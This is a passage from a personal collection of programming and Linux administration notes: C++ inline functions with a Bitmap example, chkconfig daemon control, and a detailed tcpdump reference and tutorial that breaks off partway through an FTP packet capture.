
Appunti Informatica

Oct 28, 2015

Michele Scatena

Notes ranging from Linux system topics to C++ software tricks - C++ code snippets -
Page 1: Appunti Informatica

Inline Functions (C/C++)..........................................................................................................3

LINUX DAEMONS...................................................................................................................7

tcpdump Command ( Linux ).....................................................................................................8

Complete list of byte offsets for filtering with TCPDump ( Linux ).......................................20

Itoa (C/C++).............................................................................................................................32

TCP/IP Network Configuration Files:....................................................................................33

Fedora / Red Hat Network GUI Configuration Tools:..........................................................33

Assigning an IP address:.........................................................................................................34

Changing the host name:.........................................................................................................36

Network IP aliasing:................................................................................................................36

Activating and De-Activating your NIC:................................................................................37

Network Classes:......................................................................................................................39

Enable Forwarding:.................................................................................................................40

Adding a network interface card (NIC):.................................................................................40

Configuring your NIC: Speed and Duplex settings:..............................................................42

Route:.......................................................................................................................................43

VPN, Tunneling:......................................................................................................................43

Useful Linux networking commands:....................................................................44

inetd/xinetd: Network Socket Listener Daemons:..................................................................44

inetd:.........................................................................................................................................45

xinetd: Extended Internet Services Daemon:.........................................................................45

PAM: Network Wrappers:.......................................................................................................48

ICMP:.......................................................................................................................................49

Network Monitoring Tools:.....................................................................................................49

Network Intrusion and Hacker Detection Systems:...............................................................51

ARP: Address Resolution Protocol............................................................................51

Configuring Linux For Network Multicast:...........................................................................51

Living in a MS/Windows World:.............................................................................................52

Network Definitions:................................................................................................................53

Related Links:..........................................................................................................................54

Changing the network interface name ( Linux )........................................................55

Configuring Static Routes (Linux)..........................................................................................56

Adding Command Prompt to the Explorer context menu........................................58

Removing debug information from a binary.............................................................58


Timers – microseconds resolution...........................................................................................58

Turning a Linux machine into a gateway..................................................................60

Adding Users and Restarting Samba ( Linux ).......................................................................64

Manipulating Directories ( C-C++).........................................................................................65

RPM Commands ( Linux )......................................................................................................67

STL Map iterators and deleting ( C++ )..................................................................................68

Managing Linux Modules ( Linux ).......................................................................................70

How to use your Tapedrive ( Linux )......................................................................................71

Conditional Compilation (C++)...............................................................................................78

Using command history in the bash shell ( Linux )...............................................................81

Const Correctness in C++ ( C++ )...........................................................................................88

Some examples of using UNIX find command. (Linux)........................................................99

Timers (C++)..........................................................................................................................101

Output Redirection ( iostream ) (C++)..................................................................................102

Vim..........................................................................................................................................104

Inno Setup (Windows)...........................................................................................................105

Configure NFS (Linux).........................................................................................................106

Ncurses notes ( C++ - Linux )...................................................................................112

Network Install HOWTO: Redhat Server Setup ( Linux )...................................................112

ACE Software Development Guidelines ( C++ )...................................................................116

CORBA programming: C++ type mapping for argument passing (C++ /CORBA)............134

Understanding Initialization Lists in C++ (C++).................................................................136

Time Synchronization with NTP (Linux).............................................................................140

RPM package building guide (Linux)...................................................................................148

A brief programming tutorial in C for raw sockets (Linux C++)........................................156

The Linux Socket Filter: Sniffing Bytes over the Network (Linux C++)............................162

Coding for cross platform deployment with gcc/g++: (Linux C++)....................................168

Giving a user access to another user's home directory (Linux)...........................................169

Resizing LVMs (Linux)..........................................................................................................170

Installing the CENTOS5 REPO on RED HAT 5.....................................................172

Using CentOS repositories in RHEL [better] (Linux)..............................................172

CVS2SVN migration.................................................................................................174


Inline Functions (C/C++)

Suppose that you wish to write a function in C to compute the maximum of two numbers. One way would be to say:

int max(int a, int b) { return (a > b ? a : b); }

But calling a frequently-used function can be a bit slow, and so you instead use a macro:

#define max(a, b) ((a) > (b) ? (a) : (b))

The extra parentheses are required to handle cases like:

max(a = b, c = d)

This approach can work pretty well. But it is error-prone due to the extra parentheses and also because of side effects like:

max(a++, b++)

An alternative in C++ is to use inline functions:

inline int max(int a, int b) { return (a > b ? a : b); }

Such a function is written just like a regular C or C++ function. But it IS a function and not simply a macro; macros don't really obey the rules of C++ and therefore can introduce problems. Note also that one could use C++ templates to write this function, with the argument types generalized to any numerical type.

If an inline function is a member function of a C++ class, there are a couple of ways to write it:

class A {
public:
    void f() { /* stuff */ }    // "inline" not needed
};

or:

class A {
public:
    inline void f();
};

inline void A::f() { /* stuff */ }

The second style is often a bit clearer.

The "inline" keyword is merely a hint to the compiler or development environment. Not every function can be inlined. Some typical reasons why inlining is sometimes not done include:


- the function calls itself, that is, is recursive

- the function contains loops such as for(;;) or while()

- the function size is too large

Most of the advantage of inline functions comes from avoiding the overhead of calling an actual function. Such overhead includes saving registers, setting up stack frames, and so on. But with large functions the overhead becomes less important.

Inline functions present a problem for debuggers and profilers, because the function is expanded at the point of call and loses its identity. A compiler will typically have some option available to disable inlining.

Inlining tends to blow up the size of code, because the function is expanded at each point of call. The one exception to this rule would be a very small inline function, such as one used to access a private data member:

class A {
    int x;
public:
    int getx() { return x; }
};

which is likely to be both faster and smaller than its non-inline counterpart.

A simple rule of thumb when doing development is not to use inline functions initially. After development is mostly complete, you can profile the program to see where the bottlenecks are and then change functions to inlines as appropriate.

Here's a complete program that uses inline functions as part of an implementation of bit maps. Bit maps are useful in storing true/false values efficiently. Note that in a couple of places we could use the new bool fundamental type in place of ints. Also note that this implementation assumes that chars are 8 bits in width; there's no fundamental reason they have to be (in Java(tm) the Unicode character set is used and chars are 16 bits).

This example runs about 50% faster with inlines enabled.

#include <assert.h>
#include <stdlib.h>
#include <string.h>

//#define inline

class Bitmap {
    typedef unsigned long UL;   // type of specified bit num
    UL len;                     // number of bits
    unsigned char* p;           // pointer to the bits
    UL size();                  // figure out bitmap size
public:
    Bitmap(UL);                 // constructor
    ~Bitmap();                  // destructor
    void set(UL);               // set a bit
    void clear(UL);             // clear a bit
    int test(UL);               // test a bit
    void clearall();            // clear all bits
};

// figure out bitmap size
inline Bitmap::UL Bitmap::size()
{
    return (len - 1) / 8 + 1;
}


// constructor
inline Bitmap::Bitmap(UL n)
{
    assert(n > 0);
    len = n;
    p = new unsigned char[size()];
    assert(p);
    clearall();
}

// destructor
inline Bitmap::~Bitmap()
{
    delete [] p;
}

// set a bit
inline void Bitmap::set(UL bn)
{
    assert(bn < len);
    p[bn / 8] |= (1 << (bn % 8));
}

// clear a bit
inline void Bitmap::clear(UL bn)
{
    assert(bn < len);
    p[bn / 8] &= ~(1 << (bn % 8));
}

// test a bit, return non-zero if set
inline int Bitmap::test(UL bn)
{
    assert(bn < len);
    return p[bn / 8] & (1 << (bn % 8));
}

// clear all bits
inline void Bitmap::clearall()
{
    memset(p, 0, size());
}

#ifdef DRIVER

int main()
{
    const unsigned long N = 123456L;
    int i;
    long j;
    int k;
    int r;

    for (i = 1; i <= 10; i++) {
        Bitmap bm(N);

        // set all bits then test
        for (j = 0; j < N; j++)
            bm.set(j);
        for (j = 0; j < N; j++)
            assert(bm.test(j));

        // clear all bits then test
        for (j = 0; j < N; j++)
            bm.clear(j);


        for (j = 0; j < N; j++)
            assert(!bm.test(j));

        // run clearall() then test
        bm.clearall();
        for (j = 0; j < N; j++)
            assert(!bm.test(j));

        // set and clear random bits
        k = 1000;
        while (k-- > 0) {
            r = rand() & 0xffff;
            bm.set(r);
            assert(bm.test(r));
            bm.clear(r);
            assert(!bm.test(r));
        }
    }

    return 0;
}
#endif


LINUX DAEMONS

Red Hat provides a tool to control daemons on startup: chkconfig

# chkconfig
chkconfig version 1.2.24 - Copyright (C) 1997-2000 Red Hat, Inc.
Usage:   chkconfig --list [Name]
         chkconfig --add <Name>
         chkconfig --del <Name>
         chkconfig [--level <Level>] <Name> <on|off|reset>

# chkconfig --list sendmail
sendmail        0:Aus  1:Aus  2:Ein  3:Ein  4:Ein  5:Ein  6:Aus

(The output above comes from a German locale: Aus = off, Ein = on.)

 


tcpdump Command ( Linux )

Purpose

Prints out packet headers.

Syntax

tcpdump [ -d ] [ -e ] [ -f ] [ -I ] [ -n ] [ -N ] [ -O ] [ -p ] [ -q ] [ -S ] [ -t ] [ -v ] [ -x ] [ -c Count ] [ -F File ] [ -i Interface ] [ -r File ] [ -s Snaplen ] [ -w File ] [ Expression ]

Description

The tcpdump command prints out the headers of packets captured on a network interface that matches the boolean Expression parameter. If no Expression parameter is given, all packets on the network will be dumped. Otherwise, only packets for which the Expression parameter is True will be dumped. Only Ethernet, Fiber Distributed Data Interface (FDDI), token-ring, and loopback interfaces are supported. Access is controlled by the permissions on /dev/bpf0, 1, 2, and 3.

The Expression parameter consists of one or more primitives. Primitives usually consist of an id (name or number) preceded by one or more qualifiers. There are three types of qualifier:

type

Specifies what kind of device the id name or number refers to. Possible types are host, net, and port. Examples are host foo, net 128.3, port 20. If there is no type qualifier, host is assumed.

dir

Specifies a particular transfer direction to or from id. Possible directions are src, dst, src or dst, and src and dst. Some examples with dir qualifiers are: src foo, dst net 128.3, src or dst port ftp-data. If there is no dir qualifier, src or dst is assumed.

proto

Restricts the match to a particular protocol. Possible proto qualifiers are: ether, ip, arp, rarp, tcp, and udp. Examples are: ether src foo, arp net 128.3, tcp port 21. If there is no proto qualifier, all protocols consistent with the type are assumed. For example, src foo means ip or arp, net bar means ip or arp or rarp net bar, and port 53 means tcp or udp port 53.

In addition to the above, there are some special primitive keywords that do not follow the pattern: broadcast, multicast, less, greater, and arithmetic expressions. All of these keywords are described below.

Allowable Primitives

Primitives allowed are the following:

dst host Host

True if the value of the IP (Internet Protocol) destination field of the packet is the same as the value of the Host variable, which may be either an address or a name.

src host Host

True if the value of the IP source field of the packet is the same as the value of the Host variable.

host Host

True if the value of either the IP source or destination of the packet is the same as the value of the Host variable. Any of the above host expressions can be prepended with the keywords ip, arp, or rarp as in:

ip host Host

If the Host variable is a name with multiple IP addresses, each address will be checked for a match.

dst net Net

True if the value of the IP destination address of the packet has a network number of Net.

src net Net

True if the value of the IP source address of the packet has a network number of Net.

net Net

True if the value of either the IP source or destination address of the packet has a network number of Net.

dst port Port

True if the packet is TCP/IP (Transmission Control Protocol/Internet Protocol) or IP/UDP (Internet Protocol/User Datagram Protocol) and has a destination port value of Port. The port can be a number or a name used in /etc/services. If a name is used, both the port number and protocol are checked. If a number or ambiguous name is used, only the port number is checked (dst port 513 will print both TCP/login traffic and UDP/who traffic, and port domain will print both TCP/domain and UDP/domain traffic).

src port Port

True if the value of the Port variable is the same as the value of the source port.

port Port

True if the value of either the source or the destination port of the packet is Port. Any of the above port expressions can be prepended with the keywords tcp or udp, as in:

tcp src port port

which matches only TCP packets.

less Length

True if the packet has a length less than or equal to Length. This is equivalent to:

len <= Length

greater Length

True if the packet has a length greater than or equal to the Length variable. This is equivalent to:

len >= Length

ip proto Protocol

True if the packet is an IP packet of protocol type Protocol. Protocol can be a number or one of the names icmp, udp, or tcp.

Note: The identifiers tcp, udp, and icmp are also keywords and must be escaped via \ (backslash), which is \\ (double backslash) in the Korn shell.

ip broadcast

True if the packet is an IP broadcast packet. It checks for the all-zeroes and all-ones broadcast conventions, and looks up the local subnet mask.

ip multicast

True if the packet is an IP multicast packet.

proto Protocol

True if the packet is of type Protocol. Protocol can be a number or a name like ip, arp, or rarp.

Note: These identifiers are also keywords and must be escaped via \ (backslash).

ip, arp, rarp

Abbreviations for:

proto p

where p is one of the above protocols.

tcp, udp, icmp

Abbreviations for:


ip proto p

where p is one of the above protocols.

Relational Operators of the Expression Parameter

The simple relation:

expr relop expr

Holds true where relop is one of > (greater than), < (less than), >= (greater than or equal to), <= (less than or equal to), = (equal), != (exclamation point and equal sign) and expr is an arithmetic expression composed of integer constants (expressed in standard C syntax), the normal binary operators + (plus sign), - (minus sign), * (asterisk), / (slash), & (ampersand), | (pipe), a length operator, and special packet data accessors. To access data inside the packet, use the following syntax:

proto [ expr : size ]

Proto is one of the keywords ip, arp, rarp, tcp, udp or icmp, and indicates the protocol layer for the index operation. The byte offset relative to the indicated protocol layer is given by expr. The indicator size is optional and indicates the number of bytes in the field of interest; it can be either one, two, or four, and defaults to one byte. The length operator, indicated by the keyword len, gives the length of the packet.

For example, the expression ip[0] & 0xf != 5 catches all IP packets with options, while ip[6:2] & 0x1fff = 0 catches only unfragmented datagrams and frag 0 of fragmented datagrams. The latter check is implicitly applied to the tcp and udp index operations. For instance, tcp[0] always means the first byte of the TCP header, and never means the first byte of an intervening fragment.

Combining Primitives

More complex filter expressions are built up by using the words and, or, and not to combine primitives. For example, host foo and not port ftp and not port ftp-data. To save typing, identical qualifier lists can be omitted. For example, tcp dst port ftp or ftp-data or domain is exactly the same as tcp dst port ftp or tcp dst port ftp-data or tcp dst port domain.

Primitives may be combined using a parenthesized group of primitives and operators (parentheses are special to the Shell and must be escaped).

Negation (`!' or `not'). Concatenation (`and'). Alternation (`or').

Negation has highest precedence. Alternation and concatenation have equal precedence and associate left to right.

If an identifier is given without a keyword, the most recent keyword is assumed. For example,

not host gil and devo

is short for

not host gil and host devo

which should not be confused with


not \(host gil or devo\)

Expression arguments can be passed to the tcpdump command as either a single argument or as multiple arguments, whichever is more convenient. Generally, if the expression contains Shell metacharacters, it is easier to pass it as a single, quoted argument. Multiple arguments are concatenated with spaces before being parsed.

Protocol Output Formats

The output of the tcpdump command is protocol-dependent. The following are brief descriptions and examples of most output formats.

TCP Packets

The general format of a TCP protocol line is:

src > dst: flags data-seqno ack win urg options

In the following list of fields, src, dst and flags are always present. The other fields depend on the contents of the packet's TCP protocol header and are output only if appropriate.

src Indicates the source (host) address and port. The src field is always specified.

dst Indicates the destination address and port. The dst field is always specified.

flags Specifies some combination of the flags S (SYN), F (FIN), P (PUSH) or R (RST) or a single . (period) to indicate no flags. The flags field is always specified.

data-seqno Describes the portion of sequence space covered by the data in this packet (see example below).

ack Specifies (by acknowledgement) the sequence number of the next data expected from the other direction on this connection.

win Specifies the number of bytes of receive buffer space available from the other direction on this connection.

urg Indicates there is urgent data in the packet.

options Specifies TCP options enclosed in angle brackets (for example, <mss 1024>).

Here is the opening portion of the rlogin command from host gil to host devo:

gil.1023 > devo.login: S 768512:768512(0) win 4096 <mss 1024>
devo.login > gil.1023: S 947648:947648(0) ack 768513 win 4096 <mss 1024>
gil.1023 > devo.login: . ack 1 win 4096
gil.1023 > devo.login: P 1:2(1) ack 1 win 4096
devo.login > gil.1023: . ack 2 win 4096
gil.1023 > devo.login: P 2:21(19) ack 1 win 4096
devo.login > gil.1023: P 1:2(1) ack 21 win 4077
devo.login > gil.1023: P 2:3(1) ack 21 win 4077 urg 1
devo.login > gil.1023: P 3:4(1) ack 21 win 4077 urg 1

The first line says that TCP port 1023 on host gil sent a packet to the login port on host devo. The S indicates that the SYN flag was set. The packet sequence number was 768512 and it contained no data. (The notation is `first:last(nbytes)', which means `sequence numbers first up to but not including last, which is nbytes bytes of user data'.) There was no piggy-backed ack field, the available receive window (win) was 4096 bytes, and there was a max-segment-size (mss) option requesting an mss of 1024 bytes.

Host Devo replies with a similar packet except it includes a piggy-backed ack field for host gil's SYN. Host gil then acknowledges host devo's SYN. The . (period) means no flags were set. The packet contains no data so there is no data sequence number.


Note: The ack field sequence number is a small integer (1).

The first time the tcpdump command sees a TCP conversation, it prints the sequence number from the packet. On subsequent packets of the conversation, the difference between the current packet's sequence number and this initial sequence number is printed. This means that sequence numbers after the first can be interpreted as relative byte positions in the conversation's data stream (with the first data byte in each direction being 1). The -S flag overrides this feature, causing the original sequence numbers to be output.

On the sixth line, host gil sends host devo 19 bytes of data (bytes 2 through 20 in the gil-devo side of the conversation). The PUSH flag is set in the packet. On the seventh line, host devo says it received data sent by host gil up to but not including byte 21. Most of this data is apparently sitting in the socket buffer since host devo's receive window has gotten 19 bytes smaller. Host devo also sends one byte of data to host gil in its packet. On the eighth and ninth lines, host devo sends two bytes of urgent PUSH data to host gil.

UDP Packets

UDP format is illustrated by this rwho command packet:

devo.who > bevo.who: udp 84

This line says that port who on host devo sent a UDP datagram to port who on host bevo. The packet contained 84 bytes of user data.

Some UDP services are recognized (from the source or destination port number) and the higher-level protocol information is printed. In particular, Domain Name Service requests (RFC 1034/1035) and Sun RPC calls (RFC 1050) to NFS are decoded this way.

UDP Name Server Requests

Name server requests are formatted as:

src > dst: id op? flags qtype qclass name (len)

In addition to those fields previously explained, UDP name server requests have the following:

id Specifies the identification number of the query.

op Specifies the type of operation. The default is the query operation.

qclass Specifies the query class (the normal class, C_IN, is omitted from the output).

name Specifies the domain name queried.

(len) Specifies the query length in bytes, not including the UDP and IP protocol headers.

An example of a name server request is:

tnegev.1538 > tnubia.domain: 3+ A? austin.ibm.com. (37)

Host tnegev asked the domain server on tnubia for an address record (qtype=A) associated with the name austin.ibm.com. The query id was 3. The + (plus sign) indicates the recursion desired flag was set. The query length was 37 bytes, not including the UDP and IP protocol headers. The query operation was the normal one, Query, so the op field was omitted. If the op had been anything else, it would have been printed between the 3 and the + . Similarly, the qclass was the normal one (C_IN), and it was omitted. Any other qclass would have been printed immediately after the A.


A few anomalies are checked and may result in extra fields enclosed in square brackets. If a query contains an answer, name server, or authority section, then ancount, nscount, or arcount are printed as [na], [nn] or [nau], where n is the appropriate count. If any of the response bits are set (AA, RA, or rcode) or any of the `must be zero' bits are set in bytes two and three, [b2&3=x] is printed, where x is the hex value of header bytes two and three.

UDP Name Server Responses

Name server responses are formatted as:

src > dst: id op rcode flags a/n/au type class data (len)

In addition to those fields previously explained, UDP name server responses have the following:

rcode Specifies the response code (the normal code, NoError, is omitted from the output).

data Specifies the data of the answer record.

An example of a name server response is:

tnubia.domain > tnegev.1538: 3 3/3/7 A 129.100.100.3 (273)
tnubia.domain > tnegev.1537: 2 NXDomain* 0/1/0 (97)

In the first example, tnubia responds to query 3 from tnegev with 3 answer records, 3 name server records, and 7 authority records. The first answer record is type A (address) and its data is internet address 129.100.100.3. The total size of the response was 273 bytes, excluding UDP and IP headers. The op (Query) and response code (NoError) were omitted, as was the class (C_IN) of the A record.

In the second example, tnubia responds to query 2 with a response code of non-existent domain (NXDomain) and with 0 answer records, 1 name server record, and 0 authority records. The * (asterisk) indicates that the authoritative answer bit was set. Since there were no answers, no type, class, or data were printed.

Other flag characters that might appear are - (recursion available, RA, not set) and | (truncated message, TC, set).

Note: Name server requests and responses tend to be large and the default snaplen of 80 bytes may not capture enough of the packet to print. Use the -s flag to increase the snaplen if you need to investigate large quantities of name server traffic.

NFS Requests

Sun NFS (Network File System) requests and replies are formatted as:

src.xid > dst.nfs: len op args
src.nfs > dst.xid: reply stat len

In addition to fields previously explained, NFS requests and responses include these fields:

args        Specifies the operation arguments (for example, the directory file handle).
reply stat  Indicates the response status of the operation.

An example of an NFS request and response is:

L1.e2766 > L2.nfs: 136 readdir fh 6.5197 8192 bytes @ 0
L2.nfs > L1.e2766: reply ok 384
L1.e2767 > L2.nfs: 136 lookup fh 6.5197 `RCS'


In the first line, host L1 sends a transaction with id e2766 to L2 (note that the number following the src host is a transaction id, not the source port). The request was 136 bytes, excluding the UDP and IP headers. The operation was a readdir (read directory) on file handle (fh) 6.5197. Starting at offset 0, 8192 bytes are read. L2 replies ok with 384 bytes of data.

In the third line, L1 asks L2 to lookup the name `RCS' in directory file 6.5197. Note that the data printed depends on the operation type.

Note: NFS requests are very large and the above won't be printed unless snaplen is increased. Use the flag -s 192 to watch NFS traffic.

ARP/RARP Packets

Address Resolution Protocol/Reverse Address Resolution Protocol (ARP/RARP) output shows the type of request and its arguments. The following example shows the start of the rlogin command from host devo to host bevo:

arp who-has bevo tell devo
arp reply bevo is-at 1d:2d:3d:4d:5d:6d

The first line says that devo sent an ARP packet asking for the Ethernet address of Internet host bevo. In the second line bevo replies with its Ethernet address.

IP Fragmentation

Fragmented Internet datagrams are printed as:

(frag id:size@offset+)
(frag id:size@offset)

The first form indicates that there are more fragments. The second indicates this is the last fragment. IP fragments have the following fields:

id       Identifies the fragment.
size     Specifies the fragment size (in bytes), excluding the IP header.
offset   Specifies the fragment's offset (in bytes) in the original datagram.

The fragment information is output for each fragment. The first fragment contains the higher level protocol header and the frag info is printed after the protocol info. Fragments after the first contain no higher level protocol header and the frag info is printed after the source and destination addresses. For example here is a ping echo/reply sequence:

gil > devo: icmp: echo request (frag 34111:1480@0+)
gil > devo: (frag 34111:28@1480)
devo > gil: icmp: echo reply (frag 15314:1480@0+)

A packet with the IP don't fragment flag is marked with a trailing (DF).
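The size/offset arithmetic behind this notation can be sketched in Python. This is an illustrative helper, not part of tcpdump: the function name and the 1500-byte MTU are my own assumptions. It shows how a datagram's payload maps onto the frag id:size@offset pieces printed above:

```python
# Sketch: split a payload into tcpdump-style "frag id:size@offset" pieces.
# Assumes a 20-byte IP header and that the printed size excludes that
# header, matching the fragment fields described above.

def fragments(payload_len, frag_id, mtu=1500, ip_header=20):
    """Return tcpdump-style fragment strings for a payload of payload_len bytes."""
    # Every fragment except the last must carry a multiple of 8 data bytes.
    per_frag = (mtu - ip_header) // 8 * 8
    offset = 0
    out = []
    while offset < payload_len:
        size = min(per_frag, payload_len - offset)
        more = "+" if offset + size < payload_len else ""  # "+" = more fragments
        out.append(f"(frag {frag_id}:{size}@{offset}{more})")
        offset += size
    return out

# A 1508-byte ICMP payload over a 1500-byte MTU splits like the ping example:
print(fragments(1508, 34111))
# → ['(frag 34111:1480@0+)', '(frag 34111:28@1480)']
```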

Timestamps

By default, all output lines are preceded by a timestamp. The timestamp is the current clock time in the form

hh:mm:ss.frac


and is as accurate as the kernel's clock. The timestamp reflects the time the kernel first saw the packet. No attempt is made to account for the time lag between when the ethernet interface removed the packet from the wire and when the kernel serviced the new packet interrupt.

Flags

-c Exits after receiving Count packets.

-d Dumps the compiled packet-matching code to standard output, then stops.

-e Prints the link-level header on each dump line. On Ethernet and token-ring, the source and destination addresses, protocol, and packet length are printed.

-f Prints foreign internet addresses numerically rather than symbolically.

-F Uses File as input for the filter expression. The -F flag ignores any additional expression given on the command line.

-i Listens on Interface. If unspecified, the tcpdump command searches the system interface list for the lowest numbered, configured interface that is up. This search excludes loopback interfaces.

-I (Capital i) Specifies immediate packet capture mode. The -I flag does not wait for the buffer to fill up.

-l (Lowercase L) Buffers the standard output (stdout) line. This flag is useful if you want to see the data while capturing it. For example: tcpdump -l | tee dat

or

tcpdump -l > dat & tail -f dat

-n Omits conversion of addresses to names.

-N Omits printing domain name qualification of host names. For example, the -N flag prints gil instead of gil.austin.ibm.com.

-O Omits running the packet-matching code optimizer. This is useful only if you suspect a bug in the optimizer.

-p Specifies that the interface not run in promiscuous mode.

Note: The interface might be in promiscuous mode for some other reason; hence, -p cannot be used as an abbreviation for `ether host {localhost}' or `broadcast'.

-q Quiets output. The -q flag prints less protocol information so output lines are shorter.

-r Reads packets from File (which was created with the -w option). Standard input is used if File is "-".

-s Captures Snaplen bytes of data from each packet rather than the default of 80. Eighty bytes is adequate for IP, ICMP, TCP, and UDP but may truncate protocol information from name server and NFS packets (see below). Packets truncated because of a limited snapshot are indicated in the output with "[|proto]", where proto is the name of the protocol level at which the truncation has occurred.

Note: Taking larger snapshots increases the amount of time it takes to process packets thereby decreasing the amount of packet buffering. This may cause packets to be lost. You should limit Snaplen to the smallest number of bytes that capture the protocol information you are interested in.

-S Prints absolute rather than relative TCP sequence numbers.

-t Omits the printing of a timestamp on each dump line.

-tt Prints an unformatted timestamp on each dump line.

-v Specifies slightly more verbose output. For example, the time to live and the type of service information in an IP packet is printed.

-w Writes the raw packets to File rather than parsing and printing them out. They can later be printed with the -r flag. Standard output is used if File is "-".

-x Prints each packet (minus its link-level header) in hex. The smaller of the entire packet or Snaplen bytes will be printed.

Examples


1. To print all packets arriving at or departing from devo:

tcpdump host devo

2. To print traffic between gil and either devo or bevo:

tcpdump ip host gil and \(devo or bevo\)

3. To print all IP packets between bevo and any host except gil:

tcpdump ip host bevo and not gil

4. To print all traffic between local hosts and hosts on network 192.100.192:

tcpdump net 192.100.192

5. To print traffic neither sourced from nor destined for local hosts:

tcpdump ip and not net localnet

6. To print the start and end packets (the SYN and FIN packets) of each TCP conversation that involves a non-local host:

tcpdump \(tcp[13] \& 3 !=0 and not src and dst net localnet\)

7. To print all ICMP packets that are not echo requests or replies (not ping packets):

tcpdump \(icmp[0] !=8 and icmp[0] !=0\)

8. To immediately print packet information, enter

tcpdump -I

9. To specify the token-ring interface to listen on, enter:

tcpdump -i tr0

10. To print packet information to the file TraceInfo, enter:

tcpdump -wTraceInfo

Miche: To print the UDP packets on the loopback interface:

tcpdump -i lo udp


From: http://openmaniak.com/tcpdump.php

2. TCPDUMP USE

To display the Standard TCPdump output:

# tcpdump
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

21:57:29.004426 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53
21:57:31.228013 arp who-has 192.168.1.2 tell 192.168.1.1
21:57:31.228020 arp reply 192.168.1.2 is-at 00:04:75:22:22:22 (oui Unknown)
21:57:38.035382 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53
21:57:38.613206 IP valve-68-142-64-164.phx3.llnw.net.27014 > 192.168.1.2.1034: UDP, length 36

To display the verbose output:

# tcpdump -v
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

22:00:11.625995 IP (tos 0x0, ttl 128, id 30917, offset 0, flags [none], proto: UDP (17), length: 81) 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53
22:00:20.691903 IP (tos 0x0, ttl 128, id 31026, offset 0, flags [none], proto: UDP (17), length: 81) 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53
22:00:21.230970 IP (tos 0x0, ttl 114, id 4373, offset 0, flags [none], proto: UDP (17), length: 64) valve-68-142-64-164.phx3.llnw.net.27014 > 192.168.1.2.1034: UDP, length 36
22:00:26.201715 arp who-has 192.168.1.2 tell 192.168.1.1
22:00:26.201726 arp reply 192.168.1.2 is-at 00:04:11:11:11:11 (oui Unknown)
22:00:29.706020 IP (tos 0x0, ttl 128, id 31133, offset 0, flags [none], proto: UDP (17), length: 81) 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53
22:00:38.751355 IP (tos 0x0, ttl 128, id 31256, offset 0, flags [none], proto: UDP (17), length: 81) 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53

Network interfaces available for the capture:

# tcpdump -D
1.eth0
2.any (Pseudo-device that captures on all interfaces)
3.lo

To display numerical addresses rather than symbolic (DNS) addresses:

# tcpdump -n
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

22:02:36.111595 IP 192.168.1.2.1034 > 68.142.64.164.27014: UDP, length 53
22:02:36.669853 IP 68.142.64.164.27014 > 192.168.1.2.1034: UDP, length 36
22:02:41.702977 arp who-has 192.168.1.2 tell 192.168.1.1
22:02:41.702984 arp reply 192.168.1.2 is-at 00:04:11:11:11:11
22:02:45.106515 IP 192.168.1.2.1034 > 68.142.64.164.27014: UDP, length 53
22:02:50.392139 IP 192.168.1.2.138 > 192.168.1.255.138: NBT UDP PACKET(138)
22:02:54.139658 IP 192.168.1.2.1034 > 68.142.64.164.27014: UDP, length 53
22:02:57.866958 IP 125.175.131.58.3608 > 192.168.1.2.9501: S 3275472679:3275472679(0) win 65535

To display the quick output:

# tcpdump -q
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes

22:03:55.594839 IP a213-22-130-46.cpe.netcabo.pt.3546 > 192.168.1.2.9501: tcp 0
22:03:55.698827 IP 192.168.1.2.9501 > a213-22-130-46.cpe.netcabo.pt.3546: tcp 0
22:03:56.068088 IP a213-22-130-46.cpe.netcabo.pt.3546 > 192.168.1.2.9501: tcp 0
22:03:56.068096 IP 192.168.1.2.9501 > a213-22-130-46.cpe.netcabo.pt.3546: tcp 0


22:03:57.362863 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53
22:03:57.964397 IP valve-68-142-64-164.phx3.llnw.net.27014 > 192.168.1.2.1034: UDP, length 36
22:04:06.406521 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53
22:04:15.393757 IP 192.168.1.2.1034 > valve-68-142-64-164.phx3.llnw.net.27014: UDP, length 53

Capture the traffic of a particular interface:

# tcpdump -i eth0

To capture the UDP traffic:

# tcpdump udp

To capture the TCP port 80 traffic:

# tcpdump port http

To capture the traffic from a filter stored in a file:

# tcpdump -F file_name

To create a file where the filter is configured (here the TCP port 80):

# vim file_name
port 80

To stop the capture after 20 packets:

# tcpdump -c 20

To send the capture output to a file instead of directly to the screen:

# tcpdump -w capture.log

To read a capture file:

# tcpdump -r capture.log
reading from file capture.log, link-type EN10MB (Ethernet)

09:33:51.977522 IP 192.168.1.36.40332 > rr.knams.wikimedia.org.www: P 1548302662:1548303275(613) ack 148796145 win 16527
09:33:52.031729 IP rr.knams.wikimedia.org.www > 192.168.1.36.40332: . ack 613 win 86
09:33:52.034414 IP rr.knams.wikimedia.org.www > 192.168.1.36.40332: P 1:511(510) ack 613 win 86

09:33:52.034786 IP 192.168.1.36.40332 > rr.knams.wikimedia.org.www: . ack 511 win 16527

The captured data isn't stored in plain text, so you cannot read it with a text editor; you have to use a special tool such as TCPdump (see above) or Wireshark (formerly Ethereal), which provides a graphical interface.

The capture.log file is opened with Wireshark.

To display the packets having "www.openmaniak.com" as their source or destination address:

# tcpdump host www.openmaniak.com

To display the FTP packets coming from 192.168.1.100 to 192.168.1.2:

# tcpdump src 192.168.1.100 and dst 192.168.1.2 and port ftp

To display the packets content:


# tcpdump -A

Packet capture during an FTP connection. The FTP password can easily be intercepted because it is sent in clear text to the server.

tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on ath0, link-type EN10MB (Ethernet), capture size 96 bytes

20:53:24.872785 IP ubuntu.local.40205 > 192.168.1.2.ftp: S 4155598838:4155598838(0) win 5840 ....g.................... ............
